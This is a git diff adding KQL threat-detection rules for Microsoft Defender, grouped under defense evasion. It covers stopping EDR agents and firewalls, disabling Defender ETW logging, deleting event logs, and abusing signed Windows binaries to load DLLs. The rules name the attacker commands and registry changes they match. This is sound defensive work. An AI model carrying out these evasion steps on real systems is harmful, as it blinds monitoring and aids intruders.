file diff --git a/KQL/rules/Defense Evasion/disabling_security_tools.kql b/KQL/rules/Defense Evasion/disabling_security_tools.kql new file mode 100644 index 00000000..9b31ea17 --- /dev/null +++ b/KQL/rules/Defense Evasion/disabling_security_tools.kql @@ -0,0 +1,12 @@ +// Title: Disabling Security Tools +// Author: Ömer Günal, Alejandro Ortuno, oscd.community +// Date: 2020-06-17 +// Level: medium +// Description: Detects disabling security tools +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.004 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents +| where ((ProcessCommandLine contains "cbdaemon" and ProcessCommandLine contains "stop") and FolderPath endswith "/service") or ((ProcessCommandLine contains "cbdaemon" and ProcessCommandLine contains "off") and FolderPath endswith "/chkconfig") or ((ProcessCommandLine contains "cbdaemon" and ProcessCommandLine contains "stop") and FolderPath endswith "/systemctl") or ((ProcessCommandLine contains "cbdaemon" and ProcessCommandLine contains "disable") and FolderPath endswith "/systemctl") or ((ProcessCommandLine contains "stop" and ProcessCommandLine contains "falcon-sensor") and FolderPath endswith "/systemctl") or ((ProcessCommandLine contains "disable" and ProcessCommandLine contains "falcon-sensor") and FolderPath endswith "/systemctl") or ((ProcessCommandLine contains "firewalld" and ProcessCommandLine contains "stop") and FolderPath endswith "/systemctl") or ((ProcessCommandLine contains "firewalld" and ProcessCommandLine contains "disable") and FolderPath endswith "/systemctl") or ((ProcessCommandLine contains "iptables" and ProcessCommandLine contains "stop") and FolderPath endswith "/service") or ((ProcessCommandLine contains "ip6tables" and ProcessCommandLine contains "stop") and FolderPath endswith "/service") or ((ProcessCommandLine contains "iptables" and ProcessCommandLine contains "stop") and FolderPath endswith "/chkconfig") or ((ProcessCommandLine contains "ip6tables" and ProcessCommandLine contains "stop") and FolderPath endswith "/chkconfig") or (ProcessCommandLine contains "0" and FolderPath endswith "/setenforce") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/disabling_windows_defender_wmi_autologger_session_via_reg_exe.kql b/KQL/rules/Defense Evasion/disabling_windows_defender_wmi_autologger_session_via_reg_exe.kql new file mode 100644 index 00000000..14f19685 --- /dev/null +++ b/KQL/rules/Defense Evasion/disabling_windows_defender_wmi_autologger_session_via_reg_exe.kql @@ -0,0 +1,15 @@ +// Title: Disabling Windows Defender WMI Autologger Session via Reg.exe +// Author: Matt Anderson (Huntress) +// Date: 2025-07-09 +// Level: high +// Description: Detects the use of reg.exe to disable the Event Tracing for Windows (ETW) Autologger session for Windows Defender API and Audit events. +By setting the 'Start' value to '0' for the 'DefenderApiLogger' or 'DefenderAuditLogger' session, an attacker can prevent these critical security events +from being logged, effectively blinding monitoring tools that rely on this data. This is a powerful defense evasion technique. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Highly unlikely + +DeviceProcessEvents +| where ((FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") and (ProcessCommandLine contains "add" and ProcessCommandLine contains "0") and (ProcessCommandLine contains "\\Control\\WMI\\Autologger\\DefenderApiLogger\\Start" or ProcessCommandLine contains "\\Control\\WMI\\Autologger\\DefenderAuditLogger\\Start")) and (not(ProcessCommandLine contains "0x00000001")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/diskshadow_script_mode_execution_from_potential_suspicious_location.kql b/KQL/rules/Defense Evasion/diskshadow_script_mode_execution_from_potential_suspicious_location.kql new file mode 100644 index 00000000..e2dab757 --- /dev/null +++ b/KQL/rules/Defense Evasion/diskshadow_script_mode_execution_from_potential_suspicious_location.kql @@ -0,0 +1,12 @@ +// Title: Diskshadow Script Mode - Execution From Potential Suspicious Location +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-09-15 +// Level: medium +// Description: Detects execution of "Diskshadow.exe" in script mode using the "/s" flag where the script is located in a potentially suspicious location. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 +// False Positives: +// - False positives may occur if you execute the script from one of the paths mentioned in the rule. Apply additional filters that fits your org needs. + +DeviceProcessEvents +| where (ProcessCommandLine contains "-s " or ProcessCommandLine contains "/s " or ProcessCommandLine contains "–s " or ProcessCommandLine contains "—s " or ProcessCommandLine contains "―s ") and (ProcessVersionInfoOriginalFileName =~ "diskshadow.exe" or FolderPath endswith "\\diskshadow.exe") and (ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\AppData\\Local\\" or ProcessCommandLine contains "\\AppData\\Roaming\\" or ProcessCommandLine contains "\\ProgramData\\" or ProcessCommandLine contains "\\Users\\Public\\") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/diskshadow_script_mode_uncommon_script_extension_execution.kql b/KQL/rules/Defense Evasion/diskshadow_script_mode_uncommon_script_extension_execution.kql new file mode 100644 index 00000000..3348ebad --- /dev/null +++ b/KQL/rules/Defense Evasion/diskshadow_script_mode_uncommon_script_extension_execution.kql @@ -0,0 +1,14 @@ +// Title: Diskshadow Script Mode - Uncommon Script Extension Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-09-15 +// Level: medium +// Description: Detects execution of "Diskshadow.exe" in script mode to execute an script with a potentially uncommon extension. +Initial baselining of the allowed extension list is required. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 +// False Positives: +// - False postitve might occur with legitimate or uncommon extensions used internally. Initial baseline is required. + +DeviceProcessEvents +| where ((ProcessCommandLine contains "-s " or ProcessCommandLine contains "/s " or ProcessCommandLine contains "–s " or ProcessCommandLine contains "—s " or ProcessCommandLine contains "―s ") and (ProcessVersionInfoOriginalFileName =~ "diskshadow.exe" or FolderPath endswith "\\diskshadow.exe")) and (not(ProcessCommandLine contains ".txt")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/dism_remove_online_package.kql b/KQL/rules/Defense Evasion/dism_remove_online_package.kql new file mode 100644 index 00000000..e8b6f687 --- /dev/null +++ b/KQL/rules/Defense Evasion/dism_remove_online_package.kql @@ -0,0 +1,12 @@ +// Title: Dism Remove Online Package +// Author: frack113 +// Date: 2022-01-16 +// Level: medium +// Description: Deployment Image Servicing and Management tool. DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Legitimate script + +DeviceProcessEvents +| where ((ProcessCommandLine contains "/Online" and ProcessCommandLine contains "/Disable-Feature") and FolderPath endswith "\\Dism.exe") or (FolderPath endswith "\\DismHost.exe" and (InitiatingProcessCommandLine contains "/Online" and InitiatingProcessCommandLine contains "/Disable-Feature")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/displaying_hidden_files_feature_disabled.kql b/KQL/rules/Defense Evasion/displaying_hidden_files_feature_disabled.kql new file mode 100644 index 00000000..dad91c95 --- /dev/null +++ b/KQL/rules/Defense Evasion/displaying_hidden_files_feature_disabled.kql @@ -0,0 +1,12 @@ +// Title: Displaying Hidden Files Feature Disabled +// Author: frack113 +// Date: 2022-04-02 +// Level: medium +// Description: Detects modifications to the "Hidden" and "ShowSuperHidden" explorer registry values in order to disable showing of hidden files and system files. +This technique is abused by several malware families to hide their files from normal users. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1564.001 + +DeviceRegistryEvents +| where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\ShowSuperHidden" or RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/dll_execution_via_rasautou_exe.kql b/KQL/rules/Defense Evasion/dll_execution_via_rasautou_exe.kql new file mode 100644 index 00000000..0b96f7e1 --- /dev/null +++ b/KQL/rules/Defense Evasion/dll_execution_via_rasautou_exe.kql @@ -0,0 +1,12 @@ +// Title: DLL Execution via Rasautou.exe +// Author: Julia Fomina, oscd.community +// Date: 2020-10-09 +// Level: medium +// Description: Detects using Rasautou.exe for loading arbitrary .DLL specified in -d option and executes the export specified in -p. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine contains " -d " and ProcessCommandLine contains " -p ") and (FolderPath endswith "\\rasautou.exe" or ProcessVersionInfoOriginalFileName =~ "rasdlui.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/dll_load_by_system_process_from_suspicious_locations.kql b/KQL/rules/Defense Evasion/dll_load_by_system_process_from_suspicious_locations.kql new file mode 100644 index 00000000..b19e2c39 --- /dev/null +++ b/KQL/rules/Defense Evasion/dll_load_by_system_process_from_suspicious_locations.kql @@ -0,0 +1,10 @@ +// Title: DLL Load By System Process From Suspicious Locations +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-17 +// Level: medium +// Description: Detects when a system process (i.e. located in system32, syswow64, etc.) loads a DLL from a suspicious location or a location with permissive permissions such as "C:\Users\Public" +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070 + +DeviceImageLoadEvents +| where (FolderPath startswith "C:\\Users\\Public\\" or FolderPath startswith "C:\\PerfLogs\\") and InitiatingProcessFolderPath startswith "C:\\Windows\\" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/dll_loaded_from_suspicious_location_via_cmspt_exe.kql b/KQL/rules/Defense Evasion/dll_loaded_from_suspicious_location_via_cmspt_exe.kql new file mode 100644 index 00000000..281b5027 --- /dev/null +++ b/KQL/rules/Defense Evasion/dll_loaded_from_suspicious_location_via_cmspt_exe.kql @@ -0,0 +1,12 @@ +// Title: DLL Loaded From Suspicious Location Via Cmspt.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-30 +// Level: high +// Description: Detects cmstp loading "dll" or "ocx" files from suspicious locations +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.003 +// False Positives: +// - Unikely + +DeviceImageLoadEvents +| where (FolderPath contains "\\PerfLogs\\" or FolderPath contains "\\ProgramData\\" or FolderPath contains "\\Users\\" or FolderPath contains "\\Windows\\Temp\\" or FolderPath contains "C:\\Temp\\") and (FolderPath endswith ".dll" or FolderPath endswith ".ocx") and InitiatingProcessFolderPath endswith "\\cmstp.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/dll_loaded_via_certoc_exe.kql b/KQL/rules/Defense Evasion/dll_loaded_via_certoc_exe.kql new file mode 100644 index 00000000..ec54306b --- /dev/null +++ b/KQL/rules/Defense Evasion/dll_loaded_via_certoc_exe.kql @@ -0,0 +1,10 @@ +// Title: DLL Loaded via CertOC.EXE +// Author: Austin Songer @austinsonger +// Date: 2021-10-23 +// Level: medium +// Description: Detects when a user installs certificates by using CertOC.exe to loads the target DLL file. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 + +DeviceProcessEvents +| where (ProcessCommandLine contains " -LoadDLL " or ProcessCommandLine contains " /LoadDLL " or ProcessCommandLine contains " –LoadDLL " or ProcessCommandLine contains " —LoadDLL " or ProcessCommandLine contains " ―LoadDLL ") and (FolderPath endswith "\\certoc.exe" or ProcessVersionInfoOriginalFileName =~ "CertOC.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/dll_sideloading_of_shellchromeapi_dll.kql b/KQL/rules/Defense Evasion/dll_sideloading_of_shellchromeapi_dll.kql new file mode 100644 index 00000000..37dd097e --- /dev/null +++ b/KQL/rules/Defense Evasion/dll_sideloading_of_shellchromeapi_dll.kql @@ -0,0 +1,12 @@ +// Title: DLL Sideloading Of ShellChromeAPI.DLL +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-12-01 +// Level: high +// Description: Detects processes loading the non-existent DLL "ShellChromeAPI". One known example is the "DeviceEnroller" binary in combination with the "PhoneDeepLink" flag tries to load this DLL. +Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001 + +DeviceImageLoadEvents +| where FolderPath endswith "\\ShellChromeAPI.dll" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/dllunregisterserver_function_call_via_msiexec_exe.kql b/KQL/rules/Defense Evasion/dllunregisterserver_function_call_via_msiexec_exe.kql new file mode 100644 index 00000000..7873c4fd --- /dev/null +++ b/KQL/rules/Defense Evasion/dllunregisterserver_function_call_via_msiexec_exe.kql @@ -0,0 +1,10 @@ +// Title: DllUnregisterServer Function Call Via Msiexec.EXE +// Author: frack113 +// Date: 2022-04-24 +// Level: medium +// Description: Detects MsiExec loading a DLL and calling its DllUnregisterServer function +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.007 + +DeviceProcessEvents +| where ProcessCommandLine contains ".dll" and (ProcessCommandLine contains " -z " or ProcessCommandLine contains " /z " or ProcessCommandLine contains " –z " or ProcessCommandLine contains " —z " or ProcessCommandLine contains " ―z ") and (FolderPath endswith "\\msiexec.exe" or ProcessVersionInfoOriginalFileName =~ "\\msiexec.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/dotnet_clr_dll_loaded_by_scripting_applications.kql b/KQL/rules/Defense Evasion/dotnet_clr_dll_loaded_by_scripting_applications.kql new file mode 100644 index 00000000..9a12ae14 --- /dev/null +++ b/KQL/rules/Defense Evasion/dotnet_clr_dll_loaded_by_scripting_applications.kql @@ -0,0 +1,10 @@ +// Title: DotNet CLR DLL Loaded By Scripting Applications +// Author: omkar72, oscd.community +// Date: 2020-10-14 +// Level: high +// Description: Detects .NET CLR DLLs being loaded by scripting applications such as wscript or cscript. This could be an indication of potential suspicious execution. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.privilege-escalation, attack.t1055 + +DeviceImageLoadEvents +| where (FolderPath endswith "\\clr.dll" or FolderPath endswith "\\mscoree.dll" or FolderPath endswith "\\mscorlib.dll") and (InitiatingProcessFolderPath endswith "\\cmstp.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\msxsl.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\wmic.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/driver_added_to_disallowed_images_in_hvci_registry.kql b/KQL/rules/Defense Evasion/driver_added_to_disallowed_images_in_hvci_registry.kql new file mode 100644 index 00000000..a4f28717 --- /dev/null +++ b/KQL/rules/Defense Evasion/driver_added_to_disallowed_images_in_hvci_registry.kql @@ -0,0 +1,13 @@ +// Title: Driver Added To Disallowed Images In HVCI - Registry +// Author: Nasreddine Bencherchali (Nextron Systems), Omar Khaled (@beacon_exe) +// Date: 2023-12-05 +// Level: high +// Description: Detects changes to the "HVCIDisallowedImages" registry value to potentially add a driver to the list, in order to prevent it from loading. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion +// False Positives: +// - Legitimate usage of this key would also trigger this. Investigate the driver being added and make sure its intended + +DeviceRegistryEvents +| where RegistryKey endswith "\\Control\\CI*" and RegistryKey contains "\\HVCIDisallowedImages" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/driver_dll_installation_via_odbcconf_exe.kql b/KQL/rules/Defense Evasion/driver_dll_installation_via_odbcconf_exe.kql new file mode 100644 index 00000000..5bbc8d51 --- /dev/null +++ b/KQL/rules/Defense Evasion/driver_dll_installation_via_odbcconf_exe.kql @@ -0,0 +1,12 @@ +// Title: Driver/DLL Installation Via Odbcconf.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-22 +// Level: medium +// Description: Detects execution of "odbcconf" with "INSTALLDRIVER" which installs a new ODBC driver. Attackers abuse this to install and run malicious DLLs. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.008 +// False Positives: +// - Legitimate driver DLLs being registered via "odbcconf" will generate false positives. Investigate the path of the DLL and its contents to determine if the action is authorized. + +DeviceProcessEvents +| where (ProcessCommandLine contains "INSTALLDRIVER " and ProcessCommandLine contains ".dll") and (FolderPath endswith "\\odbcconf.exe" or ProcessVersionInfoOriginalFileName =~ "odbcconf.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/drop_binaries_into_spool_drivers_color_folder.kql b/KQL/rules/Defense Evasion/drop_binaries_into_spool_drivers_color_folder.kql new file mode 100644 index 00000000..3e8320ef --- /dev/null +++ b/KQL/rules/Defense Evasion/drop_binaries_into_spool_drivers_color_folder.kql @@ -0,0 +1,10 @@ +// Title: Drop Binaries Into Spool Drivers Color Folder +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-28 +// Level: medium +// Description: Detects the creation of suspcious binary files inside the "\windows\system32\spool\drivers\color\" as seen in the blog referenced below +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceFileEvents +| where (FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".sys") and FolderPath startswith "C:\\Windows\\System32\\spool\\drivers\\color\\" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/dumpminitool_execution.kql b/KQL/rules/Defense Evasion/dumpminitool_execution.kql new file mode 100644 index 00000000..eddb3d35 --- /dev/null +++ b/KQL/rules/Defense Evasion/dumpminitool_execution.kql @@ -0,0 +1,10 @@ +// Title: DumpMinitool Execution +// Author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems) +// Date: 2022-04-06 +// Level: medium +// Description: Detects the use of "DumpMinitool.exe" a tool that allows the dump of process memory via the use of the "MiniDumpWriteDump" +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036, attack.t1003.001, attack.credential-access + +DeviceProcessEvents +| where (ProcessCommandLine contains " Full" or ProcessCommandLine contains " Mini" or ProcessCommandLine contains " WithHeap") and ((FolderPath endswith "\\DumpMinitool.exe" or FolderPath endswith "\\DumpMinitool.x86.exe" or FolderPath endswith "\\DumpMinitool.arm64.exe") or (ProcessVersionInfoOriginalFileName in~ ("DumpMinitool.exe", "DumpMinitool.x86.exe", "DumpMinitool.arm64.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/dumpstack_log_defender_evasion.kql b/KQL/rules/Defense Evasion/dumpstack_log_defender_evasion.kql new file mode 100644 index 00000000..56ddc704 --- /dev/null +++ b/KQL/rules/Defense Evasion/dumpstack_log_defender_evasion.kql @@ -0,0 +1,10 @@ +// Title: DumpStack.log Defender Evasion +// Author: Florian Roth (Nextron Systems) +// Date: 2022-01-06 +// Level: critical +// Description: Detects the use of the filename DumpStack.log to evade Microsoft Defender +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceProcessEvents +| where FolderPath endswith "\\DumpStack.log" or ProcessCommandLine contains " -o DumpStack.log" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/dynamic_csharp_compile_artefact.kql b/KQL/rules/Defense Evasion/dynamic_csharp_compile_artefact.kql new file mode 100644 index 00000000..0a1af196 --- /dev/null +++ b/KQL/rules/Defense Evasion/dynamic_csharp_compile_artefact.kql @@ -0,0 +1,13 @@ +// Title: Dynamic CSharp Compile Artefact +// Author: frack113 +// Date: 2022-01-09 +// Level: low +// Description: When C# is compiled dynamically, a .cmdline file will be created as a part of the process. +Certain processes are not typically observed compiling C# code, but can do so without touching disk. +This can be used to unpack a payload for execution + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027.004 + +DeviceFileEvents +| where FolderPath endswith ".cmdline" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/dynamic_net_compilation_via_csc_exe.kql b/KQL/rules/Defense Evasion/dynamic_net_compilation_via_csc_exe.kql new file mode 100644 index 00000000..9ab0a135 --- /dev/null +++ b/KQL/rules/Defense Evasion/dynamic_net_compilation_via_csc_exe.kql @@ -0,0 +1,14 @@ +// Title: Dynamic .NET Compilation Via Csc.EXE +// Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems) +// Date: 2019-08-24 +// Level: medium +// Description: Detects execution of "csc.exe" to compile .NET code. Attackers often leverage this to compile code on the fly and use it in other stages. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027.004 +// False Positives: +// - Legitimate software from program files - https://twitter.com/gN3mes1s/status/1206874118282448897 +// - Legitimate Microsoft software - https://twitter.com/gabriele_pippi/status/1206907900268072962 +// - Ansible + +DeviceProcessEvents +| where FolderPath endswith "\\csc.exe" and ((ProcessCommandLine contains ":\\Perflogs\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\Temporary Internet" or ProcessCommandLine contains "\\Windows\\Temp\\") or ((ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Favorites\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Favourites\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Contacts\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Pictures\\")) or ProcessCommandLine matches regex "([Pp]rogram[Dd]ata|%([Ll]ocal)?[Aa]pp[Dd]ata%|\\\\[Aa]pp[Dd]ata\\\\([Ll]ocal([Ll]ow)?|[Rr]oaming))\\\\[^\\\\]{1,256}$") and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\") or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\sdiagnhost.exe" or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\inetsrv\\w3wp.exe"))) and (not(((InitiatingProcessCommandLine contains "JwB7ACIAZgBhAGkAbABlAGQAIgA6AHQAcgB1AGUALAAiAG0AcwBnACIAOgAiAEEAbgBzAGkAYgBsAGUAIAByAGUAcQB1AGkAcgBlAHMAIABQAG8AdwBlAHIAUwBoAGUAbABsACAAdgAzAC4AMAAgAG8AcgAgAG4AZQB3AGUAcgAiAH0AJw" or InitiatingProcessCommandLine contains "cAewAiAGYAYQBpAGwAZQBkACIAOgB0AHIAdQBlACwAIgBtAHMAZwAiADoAIgBBAG4AcwBpAGIAbABlACAAcgBlAHEAdQBpAHIAZQBzACAAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAMwAuADAAIABvAHIAIABuAGUAdwBlAHIAIgB9ACcA" or InitiatingProcessCommandLine contains "nAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnA") or (InitiatingProcessFolderPath in~ ("C:\\ProgramData\\chocolatey\\choco.exe", "C:\\ProgramData\\chocolatey\\tools\\shimgen.exe")) or InitiatingProcessCommandLine contains "\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/enable_local_manifest_installation_with_winget.kql b/KQL/rules/Defense Evasion/enable_local_manifest_installation_with_winget.kql new file mode 100644 index 00000000..75b3547f --- /dev/null +++ b/KQL/rules/Defense Evasion/enable_local_manifest_installation_with_winget.kql @@ -0,0 +1,12 @@ +// Title: Enable Local Manifest Installation With Winget +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-04-17 +// Level: medium +// Description: Detects changes to the AppInstaller (winget) policy. Specifically the activation of the local manifest installation, which allows a user to install new packages via custom manifests. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence +// False Positives: +// - Administrators or developers might enable this for testing purposes or to install custom private packages + +DeviceRegistryEvents +| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\AppInstaller\\EnableLocalManifestFiles" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/enable_remote_connection_between_anonymous_computer_allowanonymouscallback.kql b/KQL/rules/Defense Evasion/enable_remote_connection_between_anonymous_computer_allowanonymouscallback.kql new file mode 100644 index 00000000..78ab8562 --- /dev/null +++ b/KQL/rules/Defense Evasion/enable_remote_connection_between_anonymous_computer_allowanonymouscallback.kql @@ -0,0 +1,12 @@ +// Title: Enable Remote Connection Between Anonymous Computer - AllowAnonymousCallback +// Author: X__Junior (Nextron Systems) +// Date: 2023-11-03 +// Level: medium +// Description: Detects enabling of the "AllowAnonymousCallback" registry value, which allows a remote connection between computers that do not have a trust relationship. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Administrative activity + +DeviceRegistryEvents +| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey contains "\\Microsoft\\WBEM\\CIMOM\\AllowAnonymousCallback" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/esxi_syslog_configuration_change_via_esxcli.kql b/KQL/rules/Defense Evasion/esxi_syslog_configuration_change_via_esxcli.kql new file mode 100644 index 00000000..4edd6106 --- /dev/null +++ b/KQL/rules/Defense Evasion/esxi_syslog_configuration_change_via_esxcli.kql @@ -0,0 +1,12 @@ +// Title: ESXi Syslog Configuration Change Via ESXCLI +// Author: Cedric Maurugeon +// Date: 2023-09-04 +// Level: medium +// Description: Detects changes to the ESXi syslog configuration via "esxcli" +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1562.001, attack.t1562.003, attack.t1059.012 +// False Positives: +// - Legitimate administrative activities + +DeviceProcessEvents +| where ProcessCommandLine contains " set" and (ProcessCommandLine contains "system" and ProcessCommandLine contains "syslog" and ProcessCommandLine contains "config") and FolderPath endswith "/esxcli" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/etw_logging_tamper_in_net_processes_via_commandline.kql b/KQL/rules/Defense Evasion/etw_logging_tamper_in_net_processes_via_commandline.kql new file mode 100644 index 00000000..e81ed4dd --- /dev/null +++ b/KQL/rules/Defense Evasion/etw_logging_tamper_in_net_processes_via_commandline.kql @@ -0,0 +1,14 @@ +// Title: ETW Logging Tamper In .NET Processes Via CommandLine +// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) +// Date: 2020-05-02 +// Level: high +// Description: Detects changes to environment variables related to ETW logging via the CommandLine. +This could indicate potential adversaries stopping ETW providers recording loaded .NET assemblies. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ProcessCommandLine contains "COMPlus_ETWEnabled" or ProcessCommandLine contains "COMPlus_ETWFlags" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/etw_trace_evasion_activity.kql b/KQL/rules/Defense Evasion/etw_trace_evasion_activity.kql new file mode 100644 index 00000000..b3cdd5fc --- /dev/null +++ b/KQL/rules/Defense Evasion/etw_trace_evasion_activity.kql @@ -0,0 +1,11 @@ +// Title: ETW Trace Evasion Activity +// Author: @neu5ron, Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community +// Date: 2019-03-22 +// Level: high +// Description: Detects command line activity that tries to clear or disable any ETW trace log which could be a sign of logging evasion. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070, attack.t1562.006, car.2016-04-002 + +DeviceProcessEvents +| where (ProcessCommandLine contains "cl" and ProcessCommandLine contains "/Trace") or (ProcessCommandLine contains "clear-log" and ProcessCommandLine contains "/Trace") or (ProcessCommandLine contains "sl" and ProcessCommandLine contains "/e:false") or (ProcessCommandLine contains "set-log" and ProcessCommandLine contains "/e:false") or (ProcessCommandLine contains "logman" and ProcessCommandLine contains "update" and ProcessCommandLine contains "trace" and ProcessCommandLine contains "--p" and ProcessCommandLine contains "-ets") or ProcessCommandLine contains "Remove-EtwTraceProvider" or (ProcessCommandLine contains "Set-EtwTraceProvider" and ProcessCommandLine contains "0x11") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/eventlog_evtx_file_deleted.kql b/KQL/rules/Defense Evasion/eventlog_evtx_file_deleted.kql new file mode 100644 index 00000000..492a3cc1 --- /dev/null +++ b/KQL/rules/Defense Evasion/eventlog_evtx_file_deleted.kql @@ -0,0 +1,10 @@ +// Title: EventLog EVTX File Deleted +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-02-15 +// Level: medium +// Description: Detects the deletion of the event log files which may indicate an attempt to destroy forensic evidence +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070 + +DeviceFileEvents +| where FolderPath endswith ".evtx" and FolderPath startswith "C:\\Windows\\System32\\winevt\\Logs\\" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/evtx_created_in_uncommon_location.kql b/KQL/rules/Defense Evasion/evtx_created_in_uncommon_location.kql new file mode 100644 index 00000000..5dbd1388 --- /dev/null +++ b/KQL/rules/Defense Evasion/evtx_created_in_uncommon_location.kql @@ -0,0 +1,16 @@ +// Title: EVTX Created In Uncommon Location +// Author: D3F7A5105 +// Date: 2023-01-02 +// Level: medium +// Description: Detects the creation of new files with the ".evtx" extension in non-common or non-standard location. +This could indicate tampering with default EVTX locations in order to evade security controls or simply exfiltration of event log to search for sensitive information within. +Note that backup software and legitimate administrator might perform similar actions during troubleshooting. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.002 +// False Positives: +// - Administrator or backup activity +// - An unknown bug seems to trigger the Windows "svchost" process to drop 